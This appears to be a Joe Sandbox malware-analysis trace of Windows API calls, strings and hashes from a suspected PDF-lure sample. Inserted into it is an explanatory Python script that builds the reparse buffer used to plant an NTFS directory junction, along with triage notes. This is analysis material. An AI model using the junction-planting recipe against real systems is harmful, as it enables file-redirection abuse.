                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                    • API String ID: 169749273-3440237614
                                                    • Opcode ID: 2865a2c9f20b6dfb4c302c7821f9df1c4730997015217ea3a598d49f39086c71
                                                    • Instruction ID: c6baa9641be7134ff092253bb59d60627e2fd312a92699374e38bc11b0f64025
                                                    • Opcode Fuzzy Hash: 2865a2c9f20b6dfb4c302c7821f9df1c4730997015217ea3a598d49f39086c71
                                                    • Instruction Fuzzy Hash: B1613C71508304AFC316DF64CC85D9FBBF8EF89710F404A2EF695961A1DB71A609CB52
                                                    APIs
                                                    • VariantInit.OLEAUT32(00000000), ref: 0038AB3D
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0038AB46
                                                    • VariantClear.OLEAUT32(?), ref: 0038AB52
                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0038AC40
                                                    • __swprintf.LIBCMT ref: 0038AC70
                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0038AC9C
                                                    • VariantInit.OLEAUT32(?), ref: 0038AD4D
                                                    • SysFreeString.OLEAUT32(00000016), ref: 0038ADDF
                                                    • VariantClear.OLEAUT32(?), ref: 0038AE35
                                                    • VariantClear.OLEAUT32(?), ref: 0038AE44
                                                    • VariantInit.OLEAUT32(00000000), ref: 0038AE80
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                    • API String ID: 3730832054-3931177956
                                                    • Opcode ID: 68c4677a7656bdc39471faefa22a585fd03b177c37790958bf25028799a136ca
                                                    • Instruction ID: d0464086f354161bffc2ede770456dc978555c60f9255d279da3cb452a3f9378
                                                    • Opcode Fuzzy Hash: 68c4677a7656bdc39471faefa22a585fd03b177c37790958bf25028799a136ca
                                                    • Instruction Fuzzy Hash: C7D1FE71A00B05DBEF23AF65C884B6AB7B9FF04700F1584A6E8059F590DB70EC44DBA2
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 003A71FC
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003A7247
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: c80c94c9f1e605d485f74bf290907829681397bcd3d309ca07bbebe63d56caae
                                                    • Instruction ID: 9c89048318e965a8e0b3b03471a0f1eb01f4f4b0b3658b8309ec7472eaf7cafd
                                                    • Opcode Fuzzy Hash: c80c94c9f1e605d485f74bf290907829681397bcd3d309ca07bbebe63d56caae
                                                    • Instruction Fuzzy Hash: 7B915D342086019BCB16EF20C891A6EB7E5EF95310F01885DFD965F7A2DB35ED0ACB81
                                                    APIs
                                                    • EnumChildWindows.USER32(?,0037CF50), ref: 0037CE90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: 4+?$CLASS$CLASSNN$H+?$INSTANCE$L+?$NAME$P+?$REGEXPCLASS$T+?$TEXT
                                                    • API String ID: 3555792229-2490583668
                                                    • Opcode ID: 2d39a9b6fff271e29b683ba1af4af483c50d2d6876bb9f64f57d0d5eec66136c
                                                    • Instruction ID: 4a2bb34ad5da400e001ffca32fcc130f889408ea8bd9e6035e09632547b61d6a
                                                    • Opcode Fuzzy Hash: 2d39a9b6fff271e29b683ba1af4af483c50d2d6876bb9f64f57d0d5eec66136c
                                                    • Instruction Fuzzy Hash: 2191913061050AABCB2ADF60C481BEAFBB5BF04300F54D51DE95DAB551DF34A99ACBD0
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003AE5AB
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,003A9808,?), ref: 003AE607
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE647
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE68C
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003AE6C3
                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,003A9808,?), ref: 003AE6CF
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003AE6DF
                                                    • DestroyIcon.USER32(?), ref: 003AE6EE
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003AE70B
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003AE717
                                                      • Part of subcall function 00360FA7: __wcsicmp_l.LIBCMT ref: 00361030
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 1212759294-1154884017
                                                    • Opcode ID: 306d49ce2621c0426b0cb58505c8eec9925d14c25b0cefbbae91a2f60ff6d9de
                                                    • Instruction ID: 742b4c65c9a6934e2c3ec08a649afd0fbad1888905ee502d16be8042959b6063
                                                    • Opcode Fuzzy Hash: 306d49ce2621c0426b0cb58505c8eec9925d14c25b0cefbbae91a2f60ff6d9de
                                                    • Instruction Fuzzy Hash: 1A61CF71500215BAEB26DF64CC46FBE77ACFB1A714F108615F915EA0E1EBB0E980CB60
                                                    APIs
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • CharLowerBuffW.USER32(?,?), ref: 0038D292
                                                    • GetDriveTypeW.KERNEL32 ref: 0038D2DF
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D327
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D35E
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0038D38C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 1148790751-4113822522
                                                    • Opcode ID: f84590f0de5a066e584e14a46c43776b93f3a8df65cad2c9e90aeebffd0ee4da
                                                    • Instruction ID: 3b827cb8fe581c93abc0ed1dc24a2966ddee087777841fbaad2400664db9bee8
                                                    • Opcode Fuzzy Hash: f84590f0de5a066e584e14a46c43776b93f3a8df65cad2c9e90aeebffd0ee4da
                                                    • Instruction Fuzzy Hash: 57514C755047059FC702EF11C88196EB7E8EF99714F10486DF886AB2A1DB71EE0ACB42
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,003B3973,00000016,0000138C,00000016,?,00000016,003DDDB4,00000000,?), ref: 003826F1
                                                    • LoadStringW.USER32(00000000,?,003B3973,00000016), ref: 003826FA
                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,003B3973,00000016,0000138C,00000016,?,00000016,003DDDB4,00000000,?,00000016), ref: 0038271C
                                                    • LoadStringW.USER32(00000000,?,003B3973,00000016), ref: 0038271F
                                                    • __swprintf.LIBCMT ref: 0038276F
                                                    • __swprintf.LIBCMT ref: 00382780
                                                    • _wprintf.LIBCMT ref: 00382829
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00382840
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 618562835-2268648507
                                                    • Opcode ID: 8c459fe2b84ef78caf3dff3b0d9f59649d441f7c6482387b27e9f2a969c3115a
                                                    • Instruction ID: 03e145cb53fb231d1b6e47cb7af041c1b680fbab1168300a674058b15c369d34
                                                    • Opcode Fuzzy Hash: 8c459fe2b84ef78caf3dff3b0d9f59649d441f7c6482387b27e9f2a969c3115a
                                                    • Instruction Fuzzy Hash: 1741EC72800219BACF16FBE0DD86DEEB7B8AF15340F500065B6057E092EA756F59CB61
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0038D0D8
                                                    • __swprintf.LIBCMT ref: 0038D0FA
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0038D137
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0038D15C
                                                    • _memset.LIBCMT ref: 0038D17B
                                                    • _wcsncpy.LIBCMT ref: 0038D1B7
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0038D1EC
                                                    • CloseHandle.KERNEL32(00000000), ref: 0038D1F7
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0038D200
                                                    • CloseHandle.KERNEL32(00000000), ref: 0038D20A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: c29a72df4866b2cbe0bcd2b48e7f3abfa8bf2a94ab7c94962b3827da28a769a0
                                                    • Instruction ID: 08d7ff3aceab59db7950d217cadac2e0f1cccbba81460fc2d327d4493d3b0300
                                                    • Opcode Fuzzy Hash: c29a72df4866b2cbe0bcd2b48e7f3abfa8bf2a94ab7c94962b3827da28a769a0
                                                    • Instruction Fuzzy Hash: 8831B476500209ABDB22EFA0DC49FEB77BDEF88740F1040B5F509D61A0E770E6448B24
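The call sequence above is the recipe for creating an NTFS directory junction (mount point): resolve the target with GetFullPathNameW, format it as an NT path with "\??\%s", CreateDirectoryW the link directory, open it with CreateFileW using GENERIC_WRITE (0x40000000), OPEN_EXISTING (3) and flags 0x02200000 (FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS), zero a buffer, copy the path into it, and hand it to DeviceIoControl with control code 0x900A4 (FSCTL_SET_REPARSE_POINT); RemoveDirectoryW is the clean-up path when the FSCTL fails. The script below is an added example, not code from the report or from AutoIt: it derives the two raw constants in the trace from their definitions so the identification can be checked, and it builds and parses the REPARSE_DATA_BUFFER that the DeviceIoControl call consumes (the _memset/_wcsncpy step), without touching the filesystem. The target path is constructed for the demonstration.

```python
import struct

# Values taken from the argument list in the trace above, with the documented
# Win32 names attached.  The page shows only the raw numbers.
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
FILE_FLAG_OPEN_REPARSE_POINT = 0x00200000
FILE_FLAG_BACKUP_SEMANTICS = 0x02000000
FILE_DEVICE_FILE_SYSTEM = 9
IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Python equivalent of the CTL_CODE macro that forms IOCTL/FSCTL numbers."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# FSCTL_SET_REPARSE_POINT is function 41 on the file-system device, buffered,
# no special access: this must come out as the 0x900A4 seen in the trace.
FSCTL_SET_REPARSE_POINT = ctl_code(FILE_DEVICE_FILE_SYSTEM, 41, 0, 0)

# The CreateFileW flags argument (0x02200000) decomposes into these two flags.
CREATEFILE_FLAGS = FILE_FLAG_OPEN_REPARSE_POINT | FILE_FLAG_BACKUP_SEMANTICS


def nt_path(target: str) -> str:
    """The "\\??\\%s" formatting step: a Win32 path in NT object-manager form."""
    return "\\??\\" + target


def build_mount_point_reparse_buffer(target: str) -> bytes:
    """Serialize a REPARSE_DATA_BUFFER (MountPointReparseBuffer variant).

    Layout: ULONG ReparseTag, USHORT ReparseDataLength, USHORT Reserved,
    then USHORT SubstituteNameOffset/Length, PrintNameOffset/Length and a
    WCHAR PathBuffer holding "<substitute>\0<print>\0".  Lengths are in
    bytes and exclude the terminating NULs.
    """
    subst = nt_path(target).encode("utf-16-le")
    prn = target.encode("utf-16-le")
    path_buffer = subst + b"\x00\x00" + prn + b"\x00\x00"
    mount = struct.pack("<HHHH", 0, len(subst), len(subst) + 2, len(prn)) + path_buffer
    return struct.pack("<IHH", IO_REPARSE_TAG_MOUNT_POINT, len(mount), 0) + mount


def reparse_data_length(buf: bytes) -> int:
    """ReparseDataLength field: bytes that follow the 8-byte header."""
    return struct.unpack_from("<H", buf, 4)[0]


def parse_mount_point_reparse_buffer(buf: bytes):
    """Inverse of build_...: return (substitute_name, print_name) or raise."""
    tag, data_len, _reserved = struct.unpack_from("<IHH", buf, 0)
    if tag != IO_REPARSE_TAG_MOUNT_POINT:
        raise ValueError(f"not a mount-point reparse buffer: tag=0x{tag:08X}")
    so, sl, po, pl = struct.unpack_from("<HHHH", buf, 8)
    path = buf[16:8 + data_len]          # PathBuffer starts after the 16-byte fixed part
    subst = path[so:so + sl].decode("utf-16-le")
    prn = path[po:po + pl].decode("utf-16-le")
    return subst, prn


# Constructed target path for the demonstration.
EXAMPLE_TARGET = "C:\\Users\\Public\\target"

if __name__ == "__main__":
    print(f"FSCTL_SET_REPARSE_POINT = 0x{FSCTL_SET_REPARSE_POINT:X}")
    print(f"CreateFileW flags       = 0x{CREATEFILE_FLAGS:08X}")
    buf = build_mount_point_reparse_buffer(EXAMPLE_TARGET)
    print(f"{len(buf)} bytes:", buf.hex())
    print(parse_mount_point_reparse_buffer(buf))
```

On Windows the returned bytes are exactly what goes in lpInBuffer of the DeviceIoControl call, with nInBufferSize set to their length. For triage the useful point is the pairing: a process that opens a freshly created, empty directory with FILE_FLAG_OPEN_REPARSE_POINT and immediately issues FSCTL_SET_REPARSE_POINT is planting a junction, and the substitute name in the buffer tells you where later file operations through that directory will actually land.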
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                    • String ID:
                                                    • API String ID: 884005220-0
                                                    • Opcode ID: e3fb4a53a3671925c33f2a57d1059f33a0c0b624360ab89b5dcae087f4cf66e6
                                                    • Instruction ID: 65429ee60e9032eda8825d70884ec8211f99b67c1ceecaa9e5b7544626d7ecbe
                                                    • Opcode Fuzzy Hash: e3fb4a53a3671925c33f2a57d1059f33a0c0b624360ab89b5dcae087f4cf66e6
                                                    • Instruction Fuzzy Hash: 2A61F232A80215EFDB335F24DD4AB7977A8AF01360F25C126E809EF185DF39C94087A6
                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 003AE754
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 003AE76B
                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 003AE776
                                                    • CloseHandle.KERNEL32(00000000), ref: 003AE783
                                                    • GlobalLock.KERNEL32(00000000), ref: 003AE78C
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 003AE79B
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 003AE7A4
                                                    • CloseHandle.KERNEL32(00000000), ref: 003AE7AB
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 003AE7BC
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,003CD9BC,?), ref: 003AE7D5
                                                    • GlobalFree.KERNEL32(00000000), ref: 003AE7E5
                                                    • GetObjectW.GDI32(?,00000018,000000FF), ref: 003AE809
                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 003AE834
                                                    • DeleteObject.GDI32(00000000), ref: 003AE85C
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003AE872
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: 90e742fd12fe5f9a37dd3013e9b5857326f799871122e257e25b595b1921d990
                                                    • Instruction ID: c867fe0c6de31c15ee0560f62a82c1a845bfb9b11ae441fa9b6a0c81145e7567
                                                    • Opcode Fuzzy Hash: 90e742fd12fe5f9a37dd3013e9b5857326f799871122e257e25b595b1921d990
                                                    • Instruction Fuzzy Hash: 8A413A75600204FFDB129F65DC48EAABBBCEF8AB11F104468F905D7260D735AD41DB60
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 0039076F
                                                    • _wcscat.LIBCMT ref: 00390787
                                                    • _wcscat.LIBCMT ref: 00390799
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003907AE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003907C2
                                                    • GetFileAttributesW.KERNEL32(?), ref: 003907DA
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 003907F4
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00390806
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: e1dfc8075b57e00cb3e221200094a958411294bf73db95857632263fa1fc0a67
                                                    • Instruction ID: 2fb303f2eafcf9d8cc0782d8271bdd9b6a428813674dab2c7848619cf5a032eb
                                                    • Opcode Fuzzy Hash: e1dfc8075b57e00cb3e221200094a958411294bf73db95857632263fa1fc0a67
                                                    • Instruction Fuzzy Hash: C5819F726043019FCF2ADF64C84596EB7E8EF89304F15882EF989DB251E730E9558B92
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003AEF3B
                                                    • GetFocus.USER32 ref: 003AEF4B
                                                    • GetDlgCtrlID.USER32(00000000), ref: 003AEF56
                                                    • _memset.LIBCMT ref: 003AF081
                                                    • GetMenuItemInfoW.USER32 ref: 003AF0AC
                                                    • GetMenuItemCount.USER32(00000000), ref: 003AF0CC
                                                    • GetMenuItemID.USER32(?,00000000), ref: 003AF0DF
                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 003AF113
                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 003AF15B
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003AF193
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 003AF1C8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 1296962147-4108050209
                                                    • Opcode ID: a328e7840c04e329253ae2513350364fe774f4fd6f308a207fff6c489d5bce45
                                                    • Instruction ID: c118fa3f28f5c6f248c1af544dc5339da8f0344686dc9b301d4de187874a10a6
                                                    • Opcode Fuzzy Hash: a328e7840c04e329253ae2513350364fe774f4fd6f308a207fff6c489d5bce45
                                                    • Instruction Fuzzy Hash: 7B817B71608301AFDB22CF54CC84E6BBBE9FB8A314F01492EF99997291D771D905CB92
                                                    APIs
                                                      • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0037ABD7
                                                      • Part of subcall function 0037ABBB: GetLastError.KERNEL32(?,0037A69F,?,?,?), ref: 0037ABE1
                                                      • Part of subcall function 0037ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0037A69F,?,?,?), ref: 0037ABF0
                                                      • Part of subcall function 0037ABBB: HeapAlloc.KERNEL32(00000000,?,0037A69F,?,?,?), ref: 0037ABF7
                                                      • Part of subcall function 0037ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0037AC0E
                                                      • Part of subcall function 0037AC56: GetProcessHeap.KERNEL32(00000008,0037A6B5,00000000,00000000,?,0037A6B5,?), ref: 0037AC62
                                                      • Part of subcall function 0037AC56: HeapAlloc.KERNEL32(00000000,?,0037A6B5,?), ref: 0037AC69
                                                      • Part of subcall function 0037AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0037A6B5,?), ref: 0037AC7A
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0037A8CB
                                                    • _memset.LIBCMT ref: 0037A8E0
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0037A8FF
                                                    • GetLengthSid.ADVAPI32(?), ref: 0037A910
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0037A94D
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0037A969
                                                    • GetLengthSid.ADVAPI32(?), ref: 0037A986
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0037A995
                                                    • HeapAlloc.KERNEL32(00000000), ref: 0037A99C
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0037A9BD
                                                    • CopySid.ADVAPI32(00000000), ref: 0037A9C4
